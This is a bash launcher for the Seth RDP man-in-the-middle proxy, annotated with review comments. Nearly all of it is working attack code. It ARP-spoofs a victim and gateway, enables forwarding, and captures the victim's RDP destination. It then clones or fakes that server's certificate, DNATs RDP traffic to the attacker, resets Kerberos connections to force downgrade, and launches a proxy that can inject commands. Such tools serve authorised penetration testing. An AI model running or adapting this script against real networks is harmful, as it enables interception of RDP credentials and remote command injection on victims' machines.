#!/bin/bash
# seth.sh - launcher for the Seth RDP proxy (see the "Run RDP proxy" step at
# the bottom of this file). The banner is printed before any checks run.
# The heredoc delimiter is quoted so nothing in the banner is expanded.
cat <<'EOF'
███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ [email protected]
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
EOF
# From here on the first failing command aborts the script.
set -e

# arpspoof, iptables and the /proc/sys writes below all need root.
if [[ "$(id -u)" != "0" ]]; then
  echo "This script must be run as root" 1>&2
  exit 1
fi

# Exactly four or five positional arguments; the optional fifth one is
# handed to seth.py as its -j option.
if [[ "$#" -ne 4 && "$#" -ne 5 ]]; then
  cat << EOF
Usage:
$0 <INTERFACE> <ATTACKER_IP> <VICTIM_IP> <GATEWAY_IP|HOST_IP> [<COMMAND>]
EOF
  exit 1
fi

# Fail early if any external tool the script shells out to is missing.
for com in tcpdump arpspoof openssl iptables; do
  if ! command -v "$com" >/dev/null 2>&1; then
    echo >&2 "$com required, but it's not installed. Aborting."
    exit 1
  fi
done

IFACE="$1"
ATTACKER_IP="$2"
VICTIM_IP="$3"
GATEWAY_IP="$4"
INJECT_COMMAND="$5"

# Environment knobs: SETH_DOWNGRADE (default 3) becomes seth.py's -g value,
# any non-empty SETH_DEBUG adds -d.
SETH_DOWNGRADE="${SETH_DOWNGRADE:-3}"
if [[ -n "$SETH_DEBUG" ]]; then
  DEBUG_FLAG="-d"
fi
if [[ -n "$INJECT_COMMAND" ]]; then
  INJECT_COMMAND="-j \"$INJECT_COMMAND\""
fi

# Save the host's current ip_forward setting so the EXIT handler can restore
# it, and locate the sibling scripts (clone-cert.sh, seth.py) next to this file.
IP_FORWARD="$(cat /proc/sys/net/ipv4/ip_forward)"
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
#######################################
# Append (A) or delete (D) the FORWARD rule that rejects the victim's
# TCP SYNs to port 3389.
# Globals:   VICTIM_IP (read)
# Arguments: $1 - "A" or "D"; any further arguments are ignored
# Returns:   the exit status of iptables
#######################################
set_iptables_1() {
  local action="$1"
  iptables "-$action" FORWARD -p tcp -s "$VICTIM_IP" --syn --dport 3389 -j REJECT
}
#######################################
# Append (A) or delete (D) the two rules used once the original RDP
# destination is known: a nat/PREROUTING DNAT of the victim's port-3389
# traffic for ORIGINAL_DEST to ATTACKER_IP, and a FORWARD rule that answers
# the victim's TCP/88 (Kerberos) connections with a reset.
# Globals:   ORIGINAL_DEST, VICTIM_IP, ATTACKER_IP (read)
# Arguments: $1 - "A" or "D"; any further arguments are ignored
# Returns:   the exit status of the last iptables call (under set -e the
#            first failing call aborts the script)
#######################################
set_iptables_2() {
  local action="$1"
  local -a dnat_rule=(-t nat "-$action" PREROUTING -p tcp -d "$ORIGINAL_DEST"
    -s "$VICTIM_IP" --dport 3389 -j DNAT --to-destination "$ATTACKER_IP")
  local -a reset_rule=("-$action" FORWARD -p tcp -s "$VICTIM_IP" --dport 88
    -j REJECT --reject-with tcp-reset)
  iptables "${dnat_rule[@]}"
  iptables "${reset_rule[@]}"
}
#######################################
# EXIT handler: undo what the script changed on this host, best effort.
# Errors are ignored (set +e plus redirections) because the script may exit
# before some of these steps were ever applied.
# Globals:   IP_FORWARD, ARP_PID_1, ARP_PID_2 (read)
# Outputs:   progress messages on stdout
#######################################
finish() {
  echo "[*] Cleaning up..."
  set +e
  set_iptables_1 D >/dev/null 2>&1
  set_iptables_2 D >/dev/null 2>&1
  # Restore the ip_forward value saved at startup.
  printf "%s" "$IP_FORWARD" > /proc/sys/net/ipv4/ip_forward
  # Stop both arpspoof instances, then any remaining children of this shell.
  local pid
  for pid in $ARP_PID_1 $ARP_PID_2; do
    kill "$pid" >/dev/null 2>&1
  done
  pkill -P $$
  echo "[*] Done."
}
trap finish EXIT
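#######################################
# Fallback used when clone-cert.sh fails: create a self-signed certificate
# for the given CN and print the key path and the certificate path, one per
# line (key first), in the same shape clone-cert.sh's output is consumed.
# The files are created with mktemp instead of fixed /tmp/<CN>.server.*
# names: this script runs as root, and a predictable path in /tmp can be
# pre-created or symlinked by any local user before openssl writes to it;
# mktemp also leaves the private key at mode 0600.
# Arguments: $1 - common name to put in the certificate subject
# Outputs:   key path and certificate path on stdout; a notice on stderr
# Returns:   0 on success; 1 if mktemp or openssl fails, so the caller's
#            set -e aborts instead of continuing with missing files
#######################################
create_self_signed_cert() {
  local cn="$1"
  local key crt
  echo "[!] Failed to clone certificate, create bogus self-signed certificate..." >&2
  key="$(mktemp "/tmp/$cn.server.key.XXXXXX")" || return 1
  crt="$(mktemp "/tmp/$cn.server.crt.XXXXXX")" || return 1
  # openssl's own output is discarded as before; only its status is kept.
  openssl req -subj "/CN=$cn/O=Seth by SySS GmbH" -new \
    -newkey rsa:2048 -days 365 -nodes -x509 \
    -keyout "$key" -out "$crt" >/dev/null 2>&1 || return 1
  printf "%s\n%s\n" "$key" "$crt"
}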
# --- Main flow. Runs under set -e with the finish trap installed; the order
# is significant: arpspoof first, then forwarding and the SYN-reject rule,
# then one SYN is captured to learn the original destination, and only then
# is the proxy started.
echo "[*] Spoofing arp replies..."
# Two background arpspoof instances, one per direction. Their PIDs are kept
# so finish can stop them on exit; their output is discarded.
arpspoof -i "$IFACE" -t "$VICTIM_IP" "$GATEWAY_IP" 2>/dev/null 1>&2 &
ARP_PID_1=$!
arpspoof -i "$IFACE" -t "$GATEWAY_IP" "$VICTIM_IP" 2>/dev/null 1>&2 &
ARP_PID_2=$!
echo "[*] Turning on IP forwarding..."
# The previous value was saved in IP_FORWARD and is restored by finish.
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "[*] Set iptables rules for SYN packets..."
# set_iptables_1 reads only $1 (A/D) and the VICTIM_IP global; the extra
# argument is ignored.
set_iptables_1 A "$VICTIM_IP"
echo "[*] Waiting for a SYN packet to the original destination..."
# Capture exactly one SYN from the victim to port 3389 (blocks until one
# arrives) and extract the dotted IPv4 destination from tcpdump's
# "... > a.b.c.d.3389: ..." text with sed.
# NOTE(review): sed prints the whole line unchanged when the pattern does not
# match, so the -z check below only catches empty tcpdump output, not an
# unparsed line.
ORIGINAL_DEST="$(tcpdump -n -c 1 -i "$IFACE" \
"tcp[tcpflags] == tcp-syn" and \
src host "$VICTIM_IP" and dst port 3389 2> /dev/null \
| sed -e 's/.*> \([0-9.]*\)\.3389:.*/\1/')"
if [ -z "$ORIGINAL_DEST" ] ; then
echo "[!] Something went wrong while parsing the output of tcpdump"
exit 1
fi
echo "[+] Got it! Original destination is $ORIGINAL_DEST"
echo "[*] Clone the x509 certificate of the original destination..."
# clone-cert.sh is tried first; if it fails, create_self_signed_cert provides
# the fallback. The combined output is split into key path (first line) and
# certificate path (last line) -- presumably clone-cert.sh prints them in the
# same key-then-cert order as the fallback; verify against clone-cert.sh.
# NOTE(review): $SCRIPT_DIR is unquoted here and on the seth.py line below,
# so a script directory containing whitespace would word-split.
CERT_KEY="$($SCRIPT_DIR/clone-cert.sh "$ORIGINAL_DEST:3389" || \
create_self_signed_cert "$ORIGINAL_DEST")"
KEYPATH="$(printf "%s" "$CERT_KEY" | head -n1)"
CERTPATH="$(printf "%s" "$CERT_KEY" | tail -n1)"
echo "[*] Adjust the iptables rule for all packets..."
# Removing the SYN-reject rule is allowed to fail (set +e around it); adding
# the DNAT/reset rules is not.
set +e
set_iptables_1 D "$VICTIM_IP"
set -e
# Only $1 is used by set_iptables_2; the remaining arguments are ignored and
# the addresses are read from the globals.
set_iptables_2 A "$VICTIM_IP" "$ATTACKER_IP" "$ORIGINAL_DEST"
echo "[*] Run RDP proxy..."
# $INJECT_COMMAND and $DEBUG_FLAG are expanded unquoted (presumably so an
# empty value contributes no argument). seth.py runs in the foreground; when
# it returns, the EXIT trap performs the cleanup.
$SCRIPT_DIR/seth.py \
$INJECT_COMMAND $DEBUG_FLAG -g "$SETH_DOWNGRADE"\
-c "$CERTPATH" -k "$KEYPATH" \
"$ORIGINAL_DEST"